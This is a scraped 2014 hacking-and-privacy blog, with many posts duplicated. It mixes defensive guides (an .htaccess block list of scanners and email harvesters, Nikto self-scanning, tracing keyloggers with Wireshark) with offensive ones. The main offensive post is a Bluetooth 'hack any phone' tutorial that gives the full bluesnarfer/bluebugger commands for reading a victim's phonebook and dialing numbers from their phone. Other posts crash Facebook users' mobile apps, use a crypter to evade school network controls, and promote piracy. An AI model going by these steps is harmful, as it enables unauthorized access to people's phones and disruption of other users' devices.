Examples of sites you can unblock:
- Kinox.to
- Movie4k
- Hulu
- Netflix
With the recent blockage from Australia of Kinox.to and Movie4k, this is a powerful tool to have in your movie watching toolbelt.
Friday, October 3, 2014
How To Unblock Streaming Sites In Australia (Or Anywhere)
Want to unblock streaming sites from Government blocks? There are many programs you can use, or websites but by far the cheapest option we have found is 143VPN. You can use this coupon code for 10% off: TDJM13K1KX
Examples of sites you can unblock:
With the recent blockage from Australia of Kinox.to and Movie4k, this is a powerful tool to have in your movie watching toolbelt.
Examples of sites you can unblock:
With the recent blockage from Australia of Kinox.to and Movie4k, this is a powerful tool to have in your movie watching toolbelt.
How To Keep Hackers From Scanning Your Websites For Vulnerabilities
Want to prevent hackers from scanning your site for exploits? Paste this code in your .htaccess file on the root directory and it will block most scanners from being able to scan your website.
How To Troll Email Harvesters On Your Sites
Want to stop email harvesters from gathering information on your website? This is a little trick I want to show you on how to basically troll email harvester programs into harvesting fake email addressed when they attempt to harvest from your website. Add the below code to your .htaccess file in your root directory of your websites and they will get random emails instead of the ones on your website.
#protect htaccess file<Files .htaccess>
deny from all
</Files>
RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mozilla.*NEWT [OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent [OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker [OR]
RewriteCond %{HTTP_USER_AGENT} ^[Ww]eb[Bb]andit [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebEMailExtrac.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^NICErsPRO [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR]
RewriteCond %{HTTP_USER_AGENT} ^Microsoft.URL [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^LinkWalker [OR]
RewriteCond %{HTTP_USER_AGENT} ^sitecheck.internetseer.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ia_archiver [OR]
RewriteCond %{HTTP_USER_AGENT} ^DIIbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^psbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector
RewriteCond %{HTTP_USER_AGENT} ^Anarchie [OR]
RewriteCond %{HTTP_USER_AGENT} ^ASPSeek [OR]
RewriteCond %{HTTP_USER_AGENT} ^attach [OR]
RewriteCond %{HTTP_USER_AGENT} ^autoemailspider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://english-61925045732.spampoison.com [R,L]
Thursday, September 25, 2014
How To Enhance Privacy And Security In Firefox
Do you want to take the next step in protecting your privacy while browsing the web? Using the Firefox Open Source browser you can accomplish your security and privacy goals. With this guide I will show you how to keep your data private and stay secure online.
Firefox was designed to be a extremely customizable web browser. It will allow you to tune nearly every aspect of your browsing experience. We shall start with the configuration inside of Firefox itself. Type about:config into the address bar and push enter. You will see this:
First we will focus on a preference called network.http.sendRefererHeader. The value by default is 2, this is bad for privacy because it will show where you are coming from because it stores habits. This is mainly used by advertisers to generate better focused ads. To disable this setting you will need to navigate to network.http.sendRefererHeader by copying and pasting it into your search bar. Double click the integer and set the number to 0 like so:
The next thing we will focus on is the privacy options built in. Go to the options menu, then go to privacy and follow these settings to ensure you are not tracked.
Now we will focus on search engines now that your browser won't be tracking you. Search engines will track what you do as well.
StartPage - A is a search engine that was launched in 2009 by Ixquick and is the worlds most private search engine. They provide results from Google without giving up your identity or habits, keep no logs and are based offshore in The Netherlands. They support these methods of encryption:
StartPage uses POST requests instead of GET requests to give your your results by default which even if you have referrer headers enabled, it would prevent sites from knowing your search queries. StartPage also allows you to connect and search from servers outside of your country to separate yourself from the Government.
DuckDuckGo - Another alternative to Google and is similar in policies as StartPage as their privacy policy states they never keep logs. The difference between StartPage and DuckDuckGo is this search engine provides results from other places besides Google such as Wikipedia, Wolfram Alpha, Bing, Yahoo, Yandex, and Yelp.
Add-ons can help you lock down on the above settings, and really fine tune your privacy. Here is a list of recommended Add-ons.
1. NoScript is one of the most recommended security addons for Firefox. It prevents Javascript, Flash, Silverlight, and many others from running. This protects you from malicious scripts or any plug-ins can reveal your IP address. We advise that you Forbid Scripts Globally after installation and then whitelist the sites you frequently browse.
2. Self-Destructing Cookies detects and deleted cookies when they are no longer in use. When you install it the addon will automtaically delete all of your cokkies, but you can undelete them as needed as well as whitelist cookies you know you will need. Basically this addon will ensure that you only have the cookies you want, and not the ones that you do not wish to have.
3. Better Privacy is an addon that will clear your cache when idle and will elimitate the threat of Supercookies or Evercookies which are hard to get rid of and detect such as Flash cookies.
4. HTTPS Everywhere basically forces HHTPS on every site that has it, preventing MitM attacks.
5. Disconnect is a add-on that blocks over 2,000 sites from tracking you around the internet, helping increase bandwidth loss and load times, as well as remaining more private.
6. Adblock Edge is a fork of Adblock Plus that blocks ads that Adblock Plus allows by default.
7. LastPass is a password manager that help you remain secure online, you only need to remember your master password and the rest can be generated. Lastpass also has 2 factor authentication, and can preform security audits of all of your accounts to tell you if the site you were registered with has been hacked, and it can help recommend a course of action.
8. Ghostery detects trackers, bugs and more on many websites and will show you what is going on under the hood. While you will not need this if you have noscripts enabled for every site, it is good for detecting what is on your whitelisted websites so you know what they are tracking.
Configuration
Firefox was designed to be a extremely customizable web browser. It will allow you to tune nearly every aspect of your browsing experience. We shall start with the configuration inside of Firefox itself. Type about:config into the address bar and push enter. You will see this:
First we will focus on a preference called network.http.sendRefererHeader. The value by default is 2, this is bad for privacy because it will show where you are coming from because it stores habits. This is mainly used by advertisers to generate better focused ads. To disable this setting you will need to navigate to network.http.sendRefererHeader by copying and pasting it into your search bar. Double click the integer and set the number to 0 like so:
The next thing we will focus on is the privacy options built in. Go to the options menu, then go to privacy and follow these settings to ensure you are not tracked.
Web Browsers
Now we will focus on search engines now that your browser won't be tracking you. Search engines will track what you do as well.
StartPage - A is a search engine that was launched in 2009 by Ixquick and is the worlds most private search engine. They provide results from Google without giving up your identity or habits, keep no logs and are based offshore in The Netherlands. They support these methods of encryption:
- TLS
- SSLv3
- TLS1.1
- TLS1.2
StartPage uses POST requests instead of GET requests to give your your results by default which even if you have referrer headers enabled, it would prevent sites from knowing your search queries. StartPage also allows you to connect and search from servers outside of your country to separate yourself from the Government.
DuckDuckGo - Another alternative to Google and is similar in policies as StartPage as their privacy policy states they never keep logs. The difference between StartPage and DuckDuckGo is this search engine provides results from other places besides Google such as Wikipedia, Wolfram Alpha, Bing, Yahoo, Yandex, and Yelp.
Add-Ons
Add-ons can help you lock down on the above settings, and really fine tune your privacy. Here is a list of recommended Add-ons.
- NoScript
- Self-Destructing Cookies
- Better Privacy
- HTTPS Everywhere
- Disconnect
- Adblock Edge
- Last Pass
- Ghostery
1. NoScript is one of the most recommended security addons for Firefox. It prevents Javascript, Flash, Silverlight, and many others from running. This protects you from malicious scripts or any plug-ins can reveal your IP address. We advise that you Forbid Scripts Globally after installation and then whitelist the sites you frequently browse.
2. Self-Destructing Cookies detects and deleted cookies when they are no longer in use. When you install it the addon will automtaically delete all of your cokkies, but you can undelete them as needed as well as whitelist cookies you know you will need. Basically this addon will ensure that you only have the cookies you want, and not the ones that you do not wish to have.
3. Better Privacy is an addon that will clear your cache when idle and will elimitate the threat of Supercookies or Evercookies which are hard to get rid of and detect such as Flash cookies.
4. HTTPS Everywhere basically forces HHTPS on every site that has it, preventing MitM attacks.
5. Disconnect is a add-on that blocks over 2,000 sites from tracking you around the internet, helping increase bandwidth loss and load times, as well as remaining more private.
6. Adblock Edge is a fork of Adblock Plus that blocks ads that Adblock Plus allows by default.
7. LastPass is a password manager that help you remain secure online, you only need to remember your master password and the rest can be generated. Lastpass also has 2 factor authentication, and can preform security audits of all of your accounts to tell you if the site you were registered with has been hacked, and it can help recommend a course of action.
8. Ghostery detects trackers, bugs and more on many websites and will show you what is going on under the hood. While you will not need this if you have noscripts enabled for every site, it is good for detecting what is on your whitelisted websites so you know what they are tracking.
Friday, September 19, 2014
CyberGhost VPN Free 1 Year Access
CyberGhost VPN is giving away over 30k Free VPN subscriptions to help spread awareness for their new proxy service.
To get the free VPN go here: http://www.cyberghostvpn.com/en_us/campaign/chip.de_sept2014
To get the free VPN go here: http://www.cyberghostvpn.com/en_us/campaign/chip.de_sept2014
Wednesday, August 27, 2014
Hackforums.net and .com have been hacked. DNS hacked.
It appears the most famous hacking forum online has been hacked. It appears that the DNS of the site was hacked, and the site still loads alright for some users including on mobile. This isn't the first time the forum has been hacked. In the past the site was hacked and entire databases of information stolen. It doesn't seem to be that critical this time around but time will tell.
The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.
The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.
Friday, August 22, 2014
How To Test A Website Or Web Server For Vulnerabilities
Do you want to know how to run some basic tests on your web server to see if it is vulnerable? This tutorial will teach you how to penetrate your own webserver and test for vlunerabilities. This method is very traceable, so I suggest you only use it on your own web servers and with your Hosts permission.
In this tutorial you will learn how to use a simple tool to find vulnerabilities on your webserver. The tool is called Nikto and is ran on Kali Linux.
Step 1: Run Nikto on Kali Linux
We will use Kali because Nikto is preinstalled. Go to: "Kali Linux - Vulnerability Analysis - Misc Scanners - nikto" and run it.
Step 2: Scan your server
To scan for vulnerabilities on a website type:
nikto -h example.com
You can use this to scan URLs as well as IP addresses. If you want to know the IP of a website just ping it.
Example:
ping example.com
Step 3: Analyse the server vulnerabilities.
Nikto will give you a report of potential vulnerabilities on the websites server. The scan will give you a list of potential vulnerabilities a hacker could try to exploit on the webserver. Some of the vulnerabilities could be a false positive so be aware of that possibility. Some of the vulnerabilities will be have a OSVDB prefix, which stands for Open Source Vulnerability Database which is a vast database of known vulnerabilities. You can check the vulnerability IDs here: http://www.osvdb.org
Warning: Only use this on your own server or servers you are authorized to Pen test.
In this tutorial you will learn how to use a simple tool to find vulnerabilities on your webserver. The tool is called Nikto and is ran on Kali Linux.
Step 1: Run Nikto on Kali Linux
We will use Kali because Nikto is preinstalled. Go to: "Kali Linux - Vulnerability Analysis - Misc Scanners - nikto" and run it.
Step 2: Scan your server
To scan for vulnerabilities on a website type:
nikto -h example.com
You can use this to scan URLs as well as IP addresses. If you want to know the IP of a website just ping it.
Example:
ping example.com
Step 3: Analyse the server vulnerabilities.
Nikto will give you a report of potential vulnerabilities on the websites server. The scan will give you a list of potential vulnerabilities a hacker could try to exploit on the webserver. Some of the vulnerabilities could be a false positive so be aware of that possibility. Some of the vulnerabilities will be have a OSVDB prefix, which stands for Open Source Vulnerability Database which is a vast database of known vulnerabilities. You can check the vulnerability IDs here: http://www.osvdb.org
Warning: Only use this on your own server or servers you are authorized to Pen test.
Monday, August 18, 2014
Backtrace A Hackers Keylogger or Rat
Have you been infected with a RAT or a Keylogger and want to find out who your attacker is? Almost all Keyloggers and RATs send information to the hacker via 2 methods. In this tutorial we will explain how to find out who they are using a program called Wireshark.
There are 2 ways an attacker can receive your information. Emails and FTP servers. You must undertstand how this works first.
By Email: The hacker configures his malware and while configuring the virus server, the hack has to input which email address to send the stolen information.
By FTP server: Much like the email method, except instead of configuring an email to send your infomation to they have an FTP server that recieves your information. Usually both methods have text logs of your keystroke activity once you have been infected.
If we monitor all data packets we can scan for one of the methods and we will have the hackers FTP info or his email address.
Wireshark is a very useful and popular network scanning tool that is used by network forensic experts to monitor the incoming and outgoing packet flow of their network cards like Ethernet or WLAN. It records every packet coming and going out of your Network.
Whenever you think you may be infected, follow the steps below to find out if and who has infected you.
Step 1
1. First of all download and install Wireshark. You can find it HERE.
Note: While Wireshark installing please ensure that it installs Winpcap otherwise it won't work correctly.
2. Now go to the "Capture" button in the top menu of Wireshark and select the interface.
3. It will capture the packets through the Network card. What you have to do is keep capturing the records for at least an hour for maximum results.
4. Now you should filter the results. Go to the filter box and type FTP and SMTP. If one doesn't work, try the other as the hacker could be using either.
5. Scroll down to find the “FTP username” and the “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will also find "email address" and its "password" that the hacker used to create the malicious server that infected you.
Thats it! You have found the hacker. Note: More advanced hacker will have other methods of securing themselves. This may not always work, but is a great first step for backtracing and catching a hacker who has infected your system.
There are 2 ways an attacker can receive your information. Emails and FTP servers. You must undertstand how this works first.
By Email: The hacker configures his malware and while configuring the virus server, the hack has to input which email address to send the stolen information.
By FTP server: Much like the email method, except instead of configuring an email to send your infomation to they have an FTP server that recieves your information. Usually both methods have text logs of your keystroke activity once you have been infected.
If we monitor all data packets we can scan for one of the methods and we will have the hackers FTP info or his email address.
Wireshark is a very useful and popular network scanning tool that is used by network forensic experts to monitor the incoming and outgoing packet flow of their network cards like Ethernet or WLAN. It records every packet coming and going out of your Network.
Whenever you think you may be infected, follow the steps below to find out if and who has infected you.
Step 1
1. First of all download and install Wireshark. You can find it HERE.
Note: While Wireshark installing please ensure that it installs Winpcap otherwise it won't work correctly.
2. Now go to the "Capture" button in the top menu of Wireshark and select the interface.
3. It will capture the packets through the Network card. What you have to do is keep capturing the records for at least an hour for maximum results.
4. Now you should filter the results. Go to the filter box and type FTP and SMTP. If one doesn't work, try the other as the hacker could be using either.
5. Scroll down to find the “FTP username” and the “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will also find "email address" and its "password" that the hacker used to create the malicious server that infected you.
Thats it! You have found the hacker. Note: More advanced hacker will have other methods of securing themselves. This may not always work, but is a great first step for backtracing and catching a hacker who has infected your system.
How Use Secure Encrypted Chat - Skype Alternatives
Are you still using skype to communicate for product support, or with strangers or people you barely know? If you are, stop. You are at risk because Skype is not secure. Skype is a chat protocol that allows people to grab your IP address due to the way it connects, which means you are vulnerable to Ddos attacks, and other types of attacks. They are also really easy to social engineer and steal accounts from. Stop using it, and use something more secure. In this article I will give you a few methods in which you can chat securely and with encryption.
Jabber Off The Record Secure chat:
The first program I will be showing you is Jabber and the OTR plugin for Jabber.
How to setup jabber:
1) Download Pidgin HERE
2) Download the OTR encryption plugin for Pidgin HERE
3) Now go here HERE and create an account. Remember the credentials you use as you will need them to login to Jabber. This is essentially your username and password for the chat program.
4) Now open up pidgin now at the tool bar at the top
Click Accounts > Manage Accounts > Add
A box will pop up. This is where you put in your jabber information. You need to put the protocol as XMPP, the username is the one you picked when you signup on zsim.de The domain is zsim.de. The password you will get when confirming your account on zsim.de. Everything else doesn't matter.
This is how it should look.
5) Now to add the OTR plugin after you downloaded and set it up you will need to add it to pidgin to do this you will need to go to Tools > Plugins > Then click off the record messaging.
Now you can add your friends by their jabber info by going to Buddies > Add buddies then type the buddies XMPP/Jabber email.
Tox: A New Kind Of Messaging
Tox is a new alternative to Skype, and allows more than Jabber does in terms of user friendly features.
From their website:
Jabber Off The Record Secure chat:
The first program I will be showing you is Jabber and the OTR plugin for Jabber.
How to setup jabber:
1) Download Pidgin HERE
2) Download the OTR encryption plugin for Pidgin HERE
3) Now go here HERE and create an account. Remember the credentials you use as you will need them to login to Jabber. This is essentially your username and password for the chat program.
4) Now open up pidgin now at the tool bar at the top
Click Accounts > Manage Accounts > Add
A box will pop up. This is where you put in your jabber information. You need to put the protocol as XMPP, the username is the one you picked when you signup on zsim.de The domain is zsim.de. The password you will get when confirming your account on zsim.de. Everything else doesn't matter.
This is how it should look.
5) Now to add the OTR plugin after you downloaded and set it up you will need to add it to pidgin to do this you will need to go to Tools > Plugins > Then click off the record messaging.
Now you can add your friends by their jabber info by going to Buddies > Add buddies then type the buddies XMPP/Jabber email.
Tox: A New Kind Of Messaging
Tox is a new alternative to Skype, and allows more than Jabber does in terms of user friendly features.
From their website:
A New Kind of Instant Messaging
With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising.
About Tox
Nowadays, every government seems to be interested in what we're saying online. Tox is built on a "privacy goes first" agenda, and we make no compromises. Your safety is our top priority, and there isn't anything in the world that will change that.
- Messages: At your fingertips.
- You're always in the loop with instant encrypted messaging.
- Calls: Make free and secure Tox to Tox calls.
- Video: Catch up face to face with a secure video call.
- Security: Tox takes your privacy seriously. With leading-class encryption, you can rest assured knowing that the only people reading your messages are the ones you send them to.
Picture credits: https://tox.im/
Tox is simple and easy to use, setup and enjoy. Compared to Skype, this is a now brainer because it can do everything Skype can do securely and you can be worry free about whether or not you will have your account stolen or someone can resolve your IP address. Visit https://tox.im/ to create an account.
Saturday, August 16, 2014
How To Hack Phones Bluetooth With Kali Linux And Backtrack
Do you want to learn how to hack a phone via Bluetooth using Kali Linux? The you have come to the right place. In this tutorial we will teach you how to hack any phone, whether it be Android, iPhone or Windows based phone using the power of Kali Linux aka backtrack and exploiting the Bluetooth connection of the phone itself.
Step 1. Install Bluesnarfer to your Linux machine using the CMD.
Open the opt directory
Make your way to the opt directory:
Download Bluesnarfer using wget
Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.
To extract you will need to use the tar xvf command
open the directory again with ls to see bluesnarfer there.
Open the directory bluesnarfer created
Finish it off by compiling the install:
To see the Bluesnarfer commands run: ./bluesnarfer
Step 2: Now that Bluesnarfer is installed, configure rfcomm.
Now to scan for potential vulnerabilities:
Ping the victim to see if he is there:
Browse the victim for rfcomm channels to connect to:
Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.
To see available commands:
To dial a number:
This is what the Bluesnarfer shell should look like:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (received call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Step 1. Install Bluesnarfer to your Linux machine using the CMD.
Open the opt directory
Make your way to the opt directory:
cd /opt
Download Bluesnarfer using wget
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz
Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.
:/opt# ls
bluesnarfer.tar.gz firmware-mod-kit metasploit Teeth
To extract you will need to use the tar xvf command
/opt# tar xvf bluesnarfer.tar.gz
open the directory again with ls to see bluesnarfer there.
/opt# ls
BFi13-dev-18 bluesnarfer.tar.gz metasploit
bluesnarfer firmware-mod-kit Teeth
Open the directory bluesnarfer created
/opt# cd bluesnarfer
/opt/bluesnarfer# ls
include Makefile README src
Finish it off by compiling the install:
/opt/bluesnarfer# make
To see the Bluesnarfer commands run: ./bluesnarfer
:/opt/bluesnarfer# ./bluesnarfer
Step 2: Now that Bluesnarfer is installed, configure rfcomm.
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
Now to scan for potential vulnerabilities:
hcitool scan hci0
Ping the victim to see if he is there:
l2ping < victim mac addr>
Browse the victim for rfcomm channels to connect to:
sdptool browse --tree --l2cap < mac addr >
Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
To see available commands:
bluebugger -h
To dial a number:
bluebugger -m < victim's name > -c 7 -a < mac addr > Dial < number >
This is what the Bluesnarfer shell should look like:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (received call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Friday, August 15, 2014
Adobe 0-Days found, Update Adobe Immediately.
Recently there have been 0-Day exploits found for a few select Adobe products. They have released updates to address the exploit to keep its customers safe from hackers. The programs that have been updated are:
The new updates were to patch exploits and various vulnerabilities that are "critical" to preform. The vulnerabilities are 0-day exploits that allow attacks to bypass sandbox protection of the Adobe products and run elevated access under windows to natively run code and remotely control slave computers infected by the 0-day.
Kaspersky Labs Global Research and Analysis Team reported CVE-2014-0546, but would not give any technical information as they are not finished with the investigation. The do confirm that the exploit has been run in some recent computers before they were made aware of this exploit.
The specific affected versions are:
Source: http://helpx.adobe.com/security/products/flash-player/apsb14-17.html
- Adobe Flash Player
- Adobe AIR
- Adobe Flash Player
- Adobe Acrobat
The new updates were to patch exploits and various vulnerabilities that are "critical" to preform. The vulnerabilities are 0-day exploits that allow attacks to bypass sandbox protection of the Adobe products and run elevated access under windows to natively run code and remotely control slave computers infected by the 0-day.
Kaspersky Labs Global Research and Analysis Team reported CVE-2014-0546, but would not give any technical information as they are not finished with the investigation. The do confirm that the exploit has been run in some recent computers before they were made aware of this exploit.
The specific affected versions are:
- Adobe Flash Player 14.0.0.145 and earlier versions for Windows and Macintosh
- Adobe Flash Player 11.2.202.394 and earlier versions for Linux
- Adobe AIR 14.0.0.110 and earlier versions for Windows and Macintosh
- Adobe AIR 14.0.0.137 SDK and earlier versions
- Adobe AIR 14.0.0.137 SDK & Compiler and earlier versions
- Adobe AIR 14.0.0.137 and earlier versions for Android
Source: http://helpx.adobe.com/security/products/flash-player/apsb14-17.html
Thursday, August 14, 2014
How to setup a Dynamic DNS - An Alternative to no-IP
So you need a Dynamic DNS and No-IP just doesn't cut it due to their recent legal issues? You have heard that No-IP has been compromised and need an alternative. We have an alternative for you, and in this tutorial we will show you step by step on how to set it up.
First of all, you must understand what a Dynamic DNS is. Basically it points a subdomain to your IP address to redirect anything connected to your IP address even if it changes. IP addresses will inevitably change. You also can connect to the Dynamic DNS directly instead of your IP, so you can keep your IP address to yourself. You can use this for game servers, personal networking and RDPs etc. 2
How to setup FreeDNS:
Step 1: Sign up at: http://freedns.afraid.org/signup/
Enter your details and send your activation email. Then check your email and you can proceed to step 2.
Step 2: Click on Dynamic DNS.
It may ask you to login. Once you have logged in you will need to navigate to the "Subdomain" section of the menu as seen below.
Step 3. Fill out the form with a domain, and subdomain to go with it. This will be your Dynamic DNS.
Once you have chosen your information it should look like this:
Step 4. Download the wget installer HERE.
Step 5. Go back to Dynamic DNS and you will see the below page. Click on wget scripts and it will download a .bat which you will need for the next step.
Step 6. Run the .bat file whenever you need your Dynamic DNS and it will Sync. You should run this before doing anything requiring a DNS.
First of all, you must understand what a Dynamic DNS is. Basically it points a subdomain to your IP address to redirect anything connected to your IP address even if it changes. IP addresses will inevitably change. You also can connect to the Dynamic DNS directly instead of your IP, so you can keep your IP address to yourself. You can use this for game servers, personal networking and RDPs etc. 2
How to setup FreeDNS:
Step 1: Sign up at: http://freedns.afraid.org/signup/
Enter your details and send your activation email. Then check your email and you can proceed to step 2.
Step 2: Click on Dynamic DNS.
It may ask you to login. Once you have logged in you will need to navigate to the "Subdomain" section of the menu as seen below.
Step 3. Fill out the form with a domain, and subdomain to go with it. This will be your Dynamic DNS.
Once you have chosen your information it should look like this:
Step 4. Download the wget installer HERE.
Step 5. Go back to Dynamic DNS and you will see the below page. Click on wget scripts and it will download a .bat which you will need for the next step.
Step 6. Run the .bat file whenever you need your Dynamic DNS and it will Sync. You should run this before doing anything requiring a DNS.
Hack Candy Crush Saga on Android
So, you want to hack Candy Crush on Android. You want to impress your friends, beat someones score and appear to be a Candy Crush God. Well, I am here to tell you how to hack Candy Crush and do all of those things.
First you are going to download the Android Xmod games App, as seen in the picture below and in my previous tutorial on how to hack clash of clans(Which you can find HERE ). Once you have installed the app you can find your mod for Candy Crush. The App can be downloaded in the Google Play Store HERE.
Once you hit launch inside of the mod the game will start with the hack injected into the application. What the exploit does is it allows you to have unlimited lives, unlimited turns and multiply your score by up to 10 times. On level 2 I was able to get 50400 points by hardly doing anything. This is the perfect Candy Crush hack for anyone who is looking to cheat to rack up points. You can share your score on facebook to make your friends jealous of your skills, but in reality you were able to figure out a very simple exploit. You are welcome.
First you are going to download the Android Xmod games App, as seen in the picture below and in my previous tutorial on how to hack clash of clans(Which you can find HERE ). Once you have installed the app you can find your mod for Candy Crush. The App can be downloaded in the Google Play Store HERE.
Once you hit launch inside of the mod the game will start with the hack injected into the application. What the exploit does is it allows you to have unlimited lives, unlimited turns and multiply your score by up to 10 times. On level 2 I was able to get 50400 points by hardly doing anything. This is the perfect Candy Crush hack for anyone who is looking to cheat to rack up points. You can share your score on facebook to make your friends jealous of your skills, but in reality you were able to figure out a very simple exploit. You are welcome.
Wednesday, August 13, 2014
Bypassing School Browsing Restrictions.
Does you college limit your search abilities? Do you want to visit Netflix, Facebook, Twitter or any other website on you schools network without being blocked? Then this tutorial is for you. This is a simple tutorial on how to bypass your schools browsing restrictions.
What You Will Need
When you run Tor on your school network it will normally say it is blocked. To keep your school network from detecting it we are going to use a program to hide it by means of encryption. all school program blocks are base on a MD5 checksum. Using an encryptor will change the MD5 checksum, and enable you to use Tor on your schools network.
All you have to do is crypt the Start Tor Browser.exe to change the MD5checksum value and now it should be able to be accessed without being blocked.
If you have issues then your network probably has a http or socks proxy for Internet access, if this is the case then the proxy settings also need to be set in the tor browser.
What You Will Need
- Tor
- A crypter Click here for a free crypter.
- A USB Stick
When you run Tor on your school network it will normally say it is blocked. To keep your school network from detecting it we are going to use a program to hide it by means of encryption. all school program blocks are base on a MD5 checksum. Using an encryptor will change the MD5 checksum, and enable you to use Tor on your schools network.
All you have to do is crypt the Start Tor Browser.exe to change the MD5checksum value and now it should be able to be accessed without being blocked.
If you have issues then your network probably has a http or socks proxy for Internet access, if this is the case then the proxy settings also need to be set in the tor browser.
How to crash all Facebook mobile users.
Step 1. Download: https://www.facebook.com/736151569751475
Step 2. Upload it to your timeline
Step 3. Make it your profile picture, as seen in the picture below.
Step 4. Go to your profile picture and rotate left, as seen in the picture below.
If you visit your timeline again it should be broken and no one can see it. If you go around messaging people, liking and commenting statuses people on the mobile messaging app will start crashing.
Step 5: How to fix your profile
Go to: http://www.facebook.com/yourusername/allactivity and remove the profile image
Step 2. Upload it to your timeline
Step 3. Make it your profile picture, as seen in the picture below.
Step 4. Go to your profile picture and rotate left, as seen in the picture below.
If you visit your timeline again it should be broken and no one can see it. If you go around messaging people, liking and commenting statuses people on the mobile messaging app will start crashing.
Step 5: How to fix your profile
Go to: http://www.facebook.com/yourusername/allactivity and remove the profile image
How to torrent anonymously
Index
Hello and welcome to my tutorial of how to torrent anonymously, as you may or may not know I sold an E-book with these methods for a while, and they are very successful. I am rewriting this tutorial so that you are aware of the ways you can remain safe. Firstly I want to start by saying download µTorrent I do not care for any other application, and I have used several different types.
Proxies
You can use a proxy to make your torrent traffic anonymous as it uses a different IP address for the download and seeding, or a series of ip addressed. I highly recommend Torguard. It is a paid proxy but it uses load balancing server proxies that switch between many different countries.
- See more at: https://torguard.net/anonymousbittorrentproxy.php#sthash.P86fObaV.dpuf
Check VPN and Proxies for torrents to see if they work here: http://ipleak.net/
Click activate and upload your torrent, it will respond with your torrent IP address.
A VPN or virtual private network will encrypt all of your internet traffic, including torrents. I recommend Torguard once again as your VPN, as they specialize in Torrenting privacy software. The difference between a proxy and a VPN is a proxy works with programs you configure, and a VPN encrypts your entire internet for the computer it is running on.
Seed Boxes
A seedbox is a server which you download and seed your torrents to and from, then you download them with ftp. For added protection use a vpn to hide your packets.
I only have one seedbox to talk about, I have used several, and this is the only one that gave me no issues. The seedbox is UnderLeech and you can get one for $16 a month. They accept Bitcoin for added security. It comes with a VPN setup so you can choose t0 download it from your secure encrypted as well.
- Introduction
- Proxies
- VPN's
- Seedboxes
Introduction
Hello and welcome to my tutorial of how to torrent anonymously, as you may or may not know I sold an E-book with these methods for a while, and they are very successful. I am rewriting this tutorial so that you are aware of the ways you can remain safe. Firstly I want to start by saying download µTorrent I do not care for any other application, and I have used several different types.
Proxies
You can use a proxy to make your torrent traffic anonymous as it uses a different IP address for the download and seeding, or a series of ip addressed. I highly recommend Torguard. It is a paid proxy but it uses load balancing server proxies that switch between many different countries.
Hide your IP address on Bittorrent with an Anonymous Torrent Proxy!
- Keep your torrent traffic 100% private from your ISP
- Automatically configure settings on Windows, Mac, Ubuntu
- Access 70+ Anonymous Proxy IP's in Four Different Countries
- Enjoy Unlimited Speeds/Bandwidth on gigabit+ connections
- Easy setup with Vuze, utorrent, bitorrent proxy walkthrough's
- Cancel your anonymous torrent proxy anytime - no penalty!
- Ensure your privacy with our FREE check my torrent ip tool
- UDP Supported on all socks5 Anonymous Proxy Servers
- See more at: https://torguard.net/anonymousbittorrentproxy.php#sthash.P86fObaV.dpuf
Check VPN and Proxies for torrents to see if they work here: http://ipleak.net/
Click activate and upload your torrent, it will respond with your torrent IP address.
VPN's
A VPN or virtual private network will encrypt all of your internet traffic, including torrents. I recommend Torguard once again as your VPN, as they specialize in Torrenting privacy software. The difference between a proxy and a VPN is a proxy works with programs you configure, and a VPN encrypts your entire internet for the computer it is running on.
Seed Boxes
A seedbox is a server which you download and seed your torrents to and from, then you download them with ftp. For added protection use a vpn to hide your packets.
